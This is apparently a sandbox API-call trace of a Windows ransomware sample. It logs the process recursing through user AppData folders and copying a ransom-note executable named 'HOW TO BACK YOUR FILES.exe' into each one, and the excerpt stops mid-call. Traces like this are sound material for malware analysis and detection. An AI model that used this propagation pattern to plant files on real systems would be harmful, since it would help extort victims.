[0104.607] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79e8 | out: hHeap=0x2b0000) returned 1 [0104.607] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98") returned 114 [0104.607] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98" [0104.608] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.608] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\0\\98\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.609] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.609] GetLastError () returned 0x0 [0104.609] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.609] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.610] CloseHandle (hObject=0x120) returned 1 [0104.610] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.610] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.610] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb8c39470, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x6bc2b9a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6bc2b9a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.610] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.610] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.610] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft Help", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft Help") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft Help" [0104.610] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cfe50 | out: hHeap=0x2b0000) returned 1 [0104.610] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7788 | out: hHeap=0x2b0000) returned 1 [0104.610] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft Help") returned 76 [0104.610] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft Help" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft Help") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft Help" [0104.610] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.610] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft Help\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\microsoft help\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.611] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.611] GetLastError () returned 0x0 [0104.611] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.611] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.611] CloseHandle (hObject=0x120) returned 1 [0104.611] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.611] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.611] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft Help\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe80ff230, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0x4d9d8fe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d9d8fe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.612] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.612] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.612] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft" [0104.612] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3210f8 | out: hHeap=0x2b0000) returned 1 [0104.612] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e77c8 | out: hHeap=0x2b0000) returned 1 [0104.612] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft") returned 71 [0104.612] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft" [0104.612] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.612] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\microsoft\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.612] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.613] GetLastError () returned 0x0 [0104.613] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.613] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.613] CloseHandle (hObject=0x120) returned 1 [0104.613] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.613] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.613] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d9d8fe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d9d8fe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.613] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.613] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.613] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar" [0104.613] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ca068 | out: hHeap=0x2b0000) returned 1 [0104.613] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d25e0 | out: hHeap=0x2b0000) returned 1 [0104.613] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar") returned 87 [0104.614] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar" [0104.614] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.614] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\microsoft\\windows sidebar\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.614] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.615] GetLastError () returned 0x0 [0104.615] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.615] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.615] CloseHandle (hObject=0x120) returned 1 [0104.615] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.615] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.615] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6bc2b9a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6bc2b9a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.615] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.615] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.615] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" [0104.615] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0104.615] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d25e0 | out: hHeap=0x2b0000) returned 1 [0104.615] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets") returned 95 [0104.615] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" [0104.615] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.615] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\microsoft\\windows sidebar\\gadgets\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.616] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.616] GetLastError () returned 0x0 [0104.616] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.616] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.616] CloseHandle (hObject=0x120) returned 1 [0104.616] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.616] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.616] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d9d8fe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d9d8fe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.617] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.617] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.617] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Media", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Media") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Media" [0104.617] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d6da8 | out: hHeap=0x2b0000) returned 1 [0104.617] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2560 | out: hHeap=0x2b0000) returned 1 [0104.617] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Media") returned 85 [0104.617] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Media" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Media") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Media" [0104.617] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.617] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Media\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\microsoft\\windows media\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.618] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.618] GetLastError () returned 0x0 [0104.618] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.618] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.618] CloseHandle (hObject=0x120) returned 1 [0104.618] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.618] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.618] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Media\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d9ff140, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d9ff140, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.618] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.618] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.618] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Media\\12.0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Media\\12.0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Media\\12.0" [0104.619] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f3148 | out: hHeap=0x2b0000) returned 1 [0104.619] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2560 | out: hHeap=0x2b0000) returned 1 [0104.619] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Media\\12.0") returned 90 [0104.619] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Media\\12.0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Media\\12.0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Media\\12.0" [0104.619] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.619] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Media\\12.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\microsoft\\windows media\\12.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.619] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.620] GetLastError () returned 0x0 [0104.620] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.620] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.620] CloseHandle (hObject=0x120) returned 1 [0104.620] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.620] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.620] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Media\\12.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6bc9ddc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6bc9ddc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.620] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.620] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.620] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Mail", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Mail") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Mail" [0104.620] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d6cf0 | out: hHeap=0x2b0000) returned 1 [0104.620] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2580 | out: hHeap=0x2b0000) returned 1 [0104.620] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Mail") returned 84 [0104.620] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Mail" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Mail") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Mail" [0104.620] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.620] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\microsoft\\windows mail\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.621] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.621] GetLastError () returned 0x0 [0104.621] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.621] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, 